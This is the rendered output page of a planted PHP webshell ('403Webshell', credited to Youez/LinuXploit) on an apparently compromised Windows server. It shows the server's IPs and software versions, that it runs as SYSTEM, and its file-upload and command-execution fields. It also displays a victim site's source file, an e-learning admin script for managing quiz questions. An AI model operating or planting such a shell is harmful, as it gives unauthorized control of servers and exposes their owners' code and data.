403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/news/elearning/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/news/elearning/admin//question_auth.php
<?php

require '../configs/app_top.php';
if (!is_admin_logged_in()) {
  redirect(generate_admin_link("login"));
  exit;
}
if (isset($_POST['mode']) && $_POST['mode'] == 'add_new') {
  $redirectTo = "questions";

  $sub_id = safe_input($_POST['id']);
  $qb_question = safe_input($_POST['qb_question']);
  $opt1 = safe_input($_POST['opt1']);
  $opt2 = safe_input($_POST['opt2']);
  $opt3 = safe_input($_POST['opt3']);
  $opt4 = safe_input($_POST['opt4']);
  $ans = safe_input($_POST['ans']);
  $sort_order = safe_input($_POST['sort_order']);

  if ($qb_question == '' || intval($sub_id) == 0 || $opt1 == '' || $opt2 == '' || $opt3 == '' || $opt4 == '' || $ans == '') {
    $_SESSION["errorMsg"] = "Please provide the required fields";
    $_SESSION["errorType"] = "danger";
  } else {

    try {

      $sql = "INSERT INTO " . TBL_QUESTIONS . " "
              . "( `qb_subject_id`, `qb_question`, `qb_option1`, `qb_option2`, `qb_option3`, `qb_option4`, `qb_answer`, `sort_order` ) VALUES "
              . "(:sub_id, :qtn, :opt1, :opt2, :opt3, :opt4,:ans, :so)";
      $stmt = $DB->prepare($sql);

      $stmt->bindValue(":sub_id", $sub_id);
      $stmt->bindValue(":qtn", $qb_question);
      $stmt->bindValue(":opt1", $opt1);
      $stmt->bindValue(":opt2", $opt2);
      $stmt->bindValue(":opt3", $opt3);
      $stmt->bindValue(":opt4", $opt4);
      $stmt->bindValue(":ans", $ans);
      $stmt->bindValue(":so", $sort_order);
      $stmt->execute();
      $retval = $stmt->rowCount();
    } catch (Exception $ex) {
       $_SESSION["errorMsg"] = $ct_name . " already exist";
       $_SESSION["errorType"] = "danger";
    }
    if ($retval > 0) {

      $_SESSION["errorMsg"] = "เพิ่มข้อสอบเสร็จเรียนร้อยแล้ว.";
      $_SESSION["errorType"] = "success";
      
    } else {
      $_SESSION["errorMsg"] = "Failed to add question. Try Again";
      $_SESSION["errorType"] = "danger";
    }
  }

  redirect(generate_admin_link($redirectTo, "id=$sub_id"));
  exit;
} else if (isset($_POST['mode']) && $_POST['mode'] == 'update') {
  $redirectTo = "questions";

  $qid = safe_input($_POST['qid']);
  $id = safe_input($_POST['id']);
  $qb_question = safe_input($_POST['qb_question']);
  $opt1 = safe_input($_POST['opt1']);
  $opt2 = safe_input($_POST['opt2']);
  $opt3 = safe_input($_POST['opt3']);
  $opt4 = safe_input($_POST['opt4']);
  $ans = safe_input($_POST['ans']);
  $sort_order = safe_input($_POST['sort_order']);
  
  

  if ($qb_question == '' || intval($qid) == 0 || $opt1 == '' || $opt2 == '' || $opt3 == '' || $opt4 == '' || $ans == '') {
    $_SESSION["errorMsg"] = "Please provide the required fields";
    $_SESSION["errorType"] = "danger";
  } else {

    try {

      $sql = "UPDATE " . TBL_QUESTIONS . "  SET "
              . " `qb_question` = :qtn, `qb_option1` = :opt1, `qb_option2` = :opt2, `qb_option3` = :opt3, `qb_option4` = :opt4,"
              . " `qb_answer` = :ans, `sort_order` = :so "
              . "WHERE `qb_id` = :id ";
      $stmt = $DB->prepare($sql);

      $stmt->bindValue(":qtn", $qb_question);
      $stmt->bindValue(":opt1", $opt1);
      $stmt->bindValue(":opt2", $opt2);
      $stmt->bindValue(":opt3", $opt3);
      $stmt->bindValue(":opt4", $opt4);
      $stmt->bindValue(":ans", $ans);
      $stmt->bindValue(":so", $sort_order);
      $stmt->bindValue(":id", $qid);
      
      $stmt->execute();
      $retval = $stmt->rowCount();
    } catch (Exception $ex) {
      $_SESSION["errorMsg"] = $ex->getMessage();
      $_SESSION["errorType"] = "danger";
      echo $ex->getMessage();die;
      
    }
    if ($retval > 0) {

      $_SESSION["errorMsg"] = "ทำการแก้ไขข้อสอบเรียบร้อยแล้ว.";
      $_SESSION["errorType"] = "success";

    } else if ($retval == 0) {

      $_SESSION["errorMsg"] = "ไม่มีการเปลี่ยนแปลงข้อมูล ระบบไม่สามารถปรับปรุงข้อสอบได้.";
      $_SESSION["errorType"] = "info";

    } else {
      $_SESSION["errorMsg"] = "Failed to update question. Try Again";
      $_SESSION["errorType"] = "danger";
    }
  }

  redirect(generate_admin_link($redirectTo, "id=$id&qid=".$qid."#$qid"));
  exit;
} else if (isset($_GET['mode']) && $_GET['mode'] == 'delete') {

  $redirectTo = "questions";
  $qid = safe_input($_GET['qid']);
  $id = safe_input($_GET['id']);
  
  try {

    $sql = "DELETE FROM " . TBL_QUESTIONS . " WHERE qb_id = :id";
    $stmt = $DB->prepare($sql);
    $stmt->bindValue(":id", $qid);

    $stmt->execute();
    $retval = $stmt->rowCount();

    if ($retval > 0) {
      $_SESSION["errorMsg"] = "Question has been deleted successfully.";
      $_SESSION["errorType"] = "success";
    } else {
      $_SESSION["errorMsg"] = "Cannot delete question. Try Again";
      $_SESSION["errorType"] = "danger";
    }
  } catch (Exception $ex) {
    $_SESSION["errorMsg"] = $ex->getMessage();
    $_SESSION["errorType"] = "danger";
    
  }
  redirect(generate_admin_link($redirectTo, "id=$id&id=".$id));
  exit;
}
redirect(generate_admin_link("home"));
?>

Youez - 2016 - github.com/yon3zu
LinuXploit